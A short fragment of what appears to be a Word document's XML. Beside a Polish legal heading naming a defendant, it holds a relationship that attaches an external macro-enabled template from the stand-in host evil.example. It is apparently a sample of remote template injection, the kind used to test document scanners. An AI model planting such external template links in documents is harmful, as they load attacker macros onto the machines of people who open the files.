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Pozwany [PERSON_NAME_1].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attachedTemplate" Target="http://evil.example/szablon.dotm" TargetMode="External"/></Relationships>
</file>